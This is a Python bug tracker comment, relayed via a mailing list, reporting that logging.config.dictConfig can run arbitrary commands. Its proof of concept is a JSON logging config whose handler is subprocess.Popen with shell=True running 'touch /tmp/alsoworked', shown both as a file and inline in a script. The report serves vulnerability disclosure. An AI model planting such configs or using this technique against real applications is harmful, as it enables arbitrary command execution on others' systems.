MarkBaggett <[email protected]> added the comment:
Let me also mention that the problem really includes anything that uses the
resolve() functions. Here is a working example that puts an exploit in a
HANDLER rather than a FORMATTER.
$ ls /tmp/alsoworked
ls: cannot access '/tmp/alsoworked': No such file or directory
$ python calculator.py
$ ls /tmp/alsoworked
/tmp/alsoworked
$ cat log.config
{
"version":1,
"root":{
"handlers" : ["EXPLOIT"]
},
"handlers":{
"EXPLOIT":{
"class": "subprocess.Popen",
"args" : "touch /tmp/alsoworked",
"shell" : "True"
}
}
}
Or if you prefer it in one file..
-----------------------------
import logging.config
import json
log_config_txt = '''{
"version":1,
"root":{
"handlers" : ["EXPLOIT"]
},
"handlers":{
"EXPLOIT":{
"class": "subprocess.Popen",
"args" : "touch /tmp/alsoworks",
"shell" : "True"
}
}
}
'''
log_config = json.loads(log_config_txt)
logging.config.dictConfig(log_config)
------------------------
----------
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue46251>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
